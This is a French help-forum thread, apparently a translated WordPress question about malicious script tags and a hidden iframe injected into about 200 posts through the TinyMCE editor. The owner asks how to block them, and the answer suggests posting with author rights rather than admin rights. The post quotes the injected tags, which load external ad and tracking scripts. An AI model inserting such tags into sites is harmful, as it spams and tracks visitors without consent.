Un de mes clients vient de recevoir 200 messages injectés par des scripts malveillants et des iframes. Le site Web est maintenant tout effacé.
Ils ont été mis dans le contenu par l'utilisateur mettant à jour la publication/la page car mon ordinateur client était infecté. (Bien que seulement dans l'éditeur TinyMCE - pas l'un des autres champs personnalisés assignés à la page/messages en particulier)
Les scripts exacts pour ce site ressemblent à ceux ci-dessous:
<script src="//serverads.net/599b47260394deb2d8.js"></script>
<script src="//pulseadnetwork.com/a/display.php?r=1131815"></script>
<script src="http://serverads.net/addons/lnkr5.min.js" type="text/javascript"></script>
Les iframes ressemblaient à ceci:
<iframe style="position: absolute; left: -1000px; top: -1000px; width: 1px; height: 1px; visibility: hidden; border: none; background-color: transparent;" src="//pulseadnetwork.com/pix.html"></iframe>
Pour éviter que cela ne se produise à l'avenir, est-il possible de désactiver/interdire complètement les scripts et les iframes placés dans TinyMCE dans WordPress?
Version de WordPres: 4.4.2
Et oui, je sais - cela ne va pas réparer l'ordinateur de mes clients. Mais espérer que cela empêchera très certainement le code malveillant de remplir l'éditeur de TinyMCE et de spammer les visiteurs du site Web de mes clients à l'avenir.
Manière simple, n’ajoutez pas de contenu lorsque vous êtes connecté en tant qu’utilisateur admin mais uniquement en tant qu’auteur. Si vous voulez aller un peu à l'extrême, supprimez les fonctionnalités de publication de l'administrateur. Vous ne savez pas où cela vous laissera avec la modification des slugs, il vous faudra donc vérifier correctement votre autorisation.
Cela répond à votre question car les utilisateurs auteurs ne sont pas autorisés à ajouter des scripts et des iframes au contenu, mais ..... si l'ordinateur de la personne disposant des autorisations d'administrateur n'est pas sécurisé, vous êtes condamné à ce que vous fassiez comme le pirate informatique peut utiliser le login pour se donner toutes les permissions qu’il veut, même faire juste des changements de niveau de base de données sans même passer par l’APIS WP.